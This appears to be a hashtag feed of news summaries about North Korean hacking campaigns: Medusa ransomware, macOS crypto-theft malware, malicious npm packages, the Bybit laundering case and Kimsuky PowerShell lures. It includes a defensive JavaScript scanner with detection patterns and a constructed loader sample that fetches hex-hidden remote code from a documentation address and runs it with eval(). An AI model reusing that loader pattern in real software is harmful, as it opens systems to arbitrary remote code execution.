Hashtag: #NorthKoreaHackers

North Korean‑linked hackers target U.S. healthcare with ransomware like Medusa, aiming to disrupt services and demand ransoms. Agencies warn attacks may continue on critical health orgs in the U.S. & Middle East. #NorthKoreaHackers #Cybersecurity #USHealthcare #Ransomware #Medusa #CISA #FBI

North Korean Hackers Deploy New macOS Malware in Crypto Theft Campaign

North Korean hackers, tracked as UNC1069 by Google's Mandiant, have deployed sophisticated new macOS malware in targeted cryptocurrency theft campaigns. These attacks leverage AI-generated deepfake videos and social engineering via Telegram to trick victims into executing malicious commands. The operation, uncovered during an investigation into a fintech company breach, highlights the evolving threat to macOS users in the crypto sector.

The malicious campaign begins with hackers compromising a legitimate Telegram account belonging to a crypto executive to build rapport with targets. They direct victims to a spoofed Calendly link leading to a fake Zoom page hosting a deepfake CEO video call. Under the guise of audio troubleshooting, attackers guide users to run ClickFix-style commands from a webpage, tailored for both macOS and Windows, initiating payload deployment.

Mandiant identified seven distinct macOS malware families in the chain, starting with AppleScript and a malicious Mach-O binary. Key tools include WAVESHAPER, a C++ backdoor for system reconnaissance and C2 communication; HYPERCALL and HIDDENCALL, Golang loaders and backdoors enabling remote access; and SILENCELIFT, a minimal backdoor disrupting Telegram on rooted systems. Newer implants like DEEPBREATH, a Swift data miner bypassing TCC protections to steal keychain, browser, and Telegram data, underscore the attack's breadth. Additional malware such as SUGARLOADER, a persistent C++ downloader, and CHROMEPUSH, a Chromium extension stealer harvesting credentials and keystrokes, maximize data exfiltration. This unusually high volume of payloads on a single host aims at crypto theft and future social engineering using stolen identities. Detection remains low, with only SUGARLOADER and WAVESHAPER showing VirusTotal flags, emphasizing stealth.

UNC1069, active since 2018, shifted from Web3 targets in 2023 to financial services and crypto infrastructure last year. Similar tactics were seen in 2025 BlueNoroff attacks, but this campaign introduces novel tools amid North Korea's growing macOS focus. Crypto firms must prioritize endpoint detection, deepfake awareness training, and TCC hardening to counter these persistent threats.

North Korean Hackers Deploy New macOS Malware in Crypto Theft Campaign #malware #Mandiant #NorthKoreaHackers


#TrackingTheTether #CryptoCrimeNetwork #CryptoCoverUp #BlockchainForensics

The International Consortium of Investigative Journalists traced tens of thousands of transactions and found major crypto trading platforms awash with dirty money.

#NorthKoreaHackers #CartelCash
#MoneyLaunderingEmpire

North Korean hackers may hold 900+ crypto jobs, ZachXBT warns
As many as 920 North Koreans might have infiltrated crypto firms, under the direction of the regime.

🚨 North Korean hackers are infiltrating crypto firms, with $16.58M paid to their IT workers since Jan 2025. 🕵️‍♂️ ZachXBT warns of insider threats—red flags include fake IDs, Russian IPs, and GitHub name changes. Stay vigilant! #CryptoSecurity #NorthKoreaHackers

North Korean Hackers Use 11 Malicious npm Packages to Propagate BeaverTail Malware

The North Korean threat actors behind the ongoing Contagious Interview campaign are expanding their tentacles on the npm ecosystem by distributing more malicious packages including the BeaverTail malware and a new remote access trojan (RAT) loader.

"These latest samples employ hexadecimal string encoding to evade automated detection systems and manual code audits, signaling a variation in the threat actors' obfuscation techniques," Socket security researcher Kirill Boychenko noted in a report.

The following packages were downloaded over 5,600 times before being removed: empty-array-validator, twitterapis, debugger-vite, snore-log, core-pino, events-utils, icloud-cod, cln-logger, node-clog, and consolidate-log.

The announcement comes nearly a month after six npm packages were discovered to be distributing BeaverTail, a JavaScript stealer that can also deploy a Python-based backdoor known as InvisibleFerret. The campaign's ultimate purpose is to breach developer systems using the premise of a job interview, steal sensitive data, syphon financial assets, and maintain long-term access to compromised networks.

The newly discovered npm packages masquerade as utilities and debuggers, with one of them - dev-debugger-vite - utilising a command-and-control (C2) address previously identified by SecurityScorecard as being used by the Lazarus Group in a campaign called Phantom Circuit in December 2024. What distinguishes these packages is that some of them, like events-utils and icloud-cod, are connected to Bitbucket repositories rather than GitHub. Furthermore, the icloud-cod package was discovered to be located in a directory called "eiwork_hire," confirming the threat actor's usage of interview-related themes to activate the infection.

An investigation of the packages cln-logger, node-clog, consolidate-log, and consolidate-logger revealed slight code-level differences, indicating that the attackers are publishing numerous malware variants to boost the campaign's success rate. Regardless of the alterations, the malicious code encoded in the four packages acts as a remote access trojan (RAT) loader, capable of spreading a next-stage payload from a remote server. Cybersecurity expert Boychenko stated that the exact nature of the malware being disseminated via the loader is unknown at this time due to the C2 endpoints no longer serving payloads.

"The code functions as an active malware loader with remote access trojan (RAT) capabilities," Boychenko noted. "It dynamically fetches and executes remote JavaScript via eval(), enabling North Korean attackers to run arbitrary code on infected systems. This behavior allows them to deploy any follow-up malware of their choosing, making the loader a significant threat on its own."

The findings highlight the persistent nature of Contagious Interview, which, in addition to posing a long-term threat to software supply chains, has adopted the infamous ClickFix social engineering approach to propagate malware.

The discovery of the new npm packages comes as South Korean cybersecurity firm AhnLab outlined a recruitment-themed phishing effort that downloads BeaverTail, which is subsequently used to launch a previously undocumented Windows backdoor known as Tropidoor. The firm's analysis of data shows that BeaverTail is actively targeting developers in South Korea.

North Korean Hackers Use 11 Malicious npm Packages to Propagate BeaverTail Malware #BeaverTail #malware #NorthKoreaHackers

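The post above describes two traits of the npm loader packages: hexadecimal string encoding used to hide strings from automated scanners and code audits, and a loader that fetches remote JavaScript and hands it to eval(). The following is an added example, not Socket's tooling and not the contents of any of the listed packages: a small static triage scanner that decodes runs of \xNN escapes so hidden URLs become visible, then flags sources that combine a network call with eval() or new Function(). Both package samples embedded below are constructed for the example; the decoded address 192.0.2.1 is from the RFC 5737 documentation range, not a real C2 endpoint.

```javascript
// Added example (not Socket's tooling, not the real package code): a static triage
// scanner for the two loader traits described in the post above, hexadecimal
// string encoding and eval() of JavaScript fetched from a remote server.
// The regexes are heuristics for triage; a real review still reads the decoded source.

const HEX_ESCAPE_RUN  = /(?:\\x[0-9a-fA-F]{2}){8,}/g;        // 8+ consecutive \xNN escapes
const HEX_LITERAL     = /["'](?:[0-9a-fA-F]{2}){16,}["']/g;  // quoted bare hex, 32+ hex digits
const BUFFER_FROM_HEX = /Buffer\.from\(\s*[^,()]+,\s*["']hex["']\s*\)/g;
const EVAL_CALL       = /\beval\s*\(|\bnew\s+Function\s*\(/g;
const NET_CALL        = /\b(?:https?\.(?:get|request)|fetch|axios(?:\.get|\.post)?)\s*\(/g;
const RAW_IP_URL      = /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/g;

// Replace every run of \xNN escapes with the characters it spells out, so that a
// URL or call hidden behind hex encoding becomes visible to the later checks.
function decodeHexEscapes(src) {
  return src.replace(HEX_ESCAPE_RUN, run =>
    run.match(/\\x([0-9a-fA-F]{2})/g)
       .map(h => String.fromCharCode(parseInt(h.slice(2), 16)))
       .join(''));
}

// Obfuscation indicators are counted on the raw source; loader indicators are
// counted on the decoded source, since an obfuscated package hides them there.
function scanSource(src) {
  const count = (text, re) => (text.match(re) || []).length;
  const decoded = decodeHexEscapes(src);
  const findings = {
    hexEscapeRuns: count(src, HEX_ESCAPE_RUN),
    hexLiterals:   count(src, HEX_LITERAL),
    bufferFromHex: count(src, BUFFER_FROM_HEX),
    evalCalls:     count(decoded, EVAL_CALL),
    networkCalls:  count(decoded, NET_CALL),
    rawIpUrls:     count(decoded, RAW_IP_URL),
  };
  const obfuscated = findings.hexEscapeRuns + findings.hexLiterals + findings.bufferFromHex > 0;
  const remoteLoader = findings.evalCalls > 0 && (findings.networkCalls > 0 || findings.rawIpUrls > 0);
  let verdict = 'clean';
  if (obfuscated && remoteLoader) verdict = 'obfuscated-remote-loader';
  else if (remoteLoader) verdict = 'remote-loader';
  else if (obfuscated) verdict = 'obfuscated';
  return { verdict, findings, decodedUrls: decoded.match(RAW_IP_URL) || [] };
}

// Constructed sample, NOT the actual malware: the hex run decodes to
// "http://192.0.2.1:8080/p" (an RFC 5737 documentation address), and the
// response body is handed straight to eval(). String.raw keeps the backslashes.
const SAMPLE_LOADER = String.raw`
const http = require('http');
const u = "\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39\x32\x2e\x30\x2e\x32\x2e\x31\x3a\x38\x30\x38\x30\x2f\x70";
http.get(u, r => { let b = ''; r.on('data', d => b += d); r.on('end', () => eval(b)); });
`;

// Constructed benign logger, for contrast (the real packages posed as such utilities).
const SAMPLE_BENIGN = String.raw`
const pino = require('pino');
module.exports = function log(msg) { pino().info(msg); };
`;

for (const [name, src] of [['sample-loader', SAMPLE_LOADER], ['sample-benign', SAMPLE_BENIGN]]) {
  const r = scanSource(src);
  console.log(name, r.verdict, r.decodedUrls.join(','), JSON.stringify(r.findings));
}
```

Run it against the unpacked tarball of a suspect package (for example over every .js file under node_modules/<name>/) and treat any "remote-loader" verdict as a stop-ship finding; the decoded URLs are the indicators worth pivoting on, because a scanner that only greps the raw source never sees them.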
Bybit Hack: How Lazarus Group May Launder $1.4B Through Crypto Mixers
Bybit Hack Proceeds May Be Laundered Through Crypto Mixers, Warns Elliptic
Blockchain analytics firm Elliptic has raised concerns that the

Bybit Hack: How Lazarus Group May Launder $1.4B Through Crypto Mixers.
#BybitHack #CryptoHack #LazarusGroup #CryptoTheft #BlockchainForensics #CryptoMixers #CryptoLaundering #Elliptic #NorthKoreaHackers #CryptoSecurity #EthereumHack #StolenCrypto #CryptoExchanges #DEXs #CryptoAssets #StolenFunds

DPRK Hackers Dupe Targets into Typing PowerShell Commands as Admin: A Comprehensive Report | The DefendOps Diaries
Explore how Kimsuky hackers use PowerShell and social engineering to exploit targets, highlighting the need for robust cybersecurity measures.

DPRK Hackers Dupe Targets into Typing PowerShell Commands as Admin: A Comprehensive Report

thedefendopsdiaries.com/dprk-hackers...

#kimsuky
#powershell
#cybersecurity
#socialengineering
#infosec
#cyberthreats
#northkoreahackers
#phishing
#cyberattack
#securityawareness
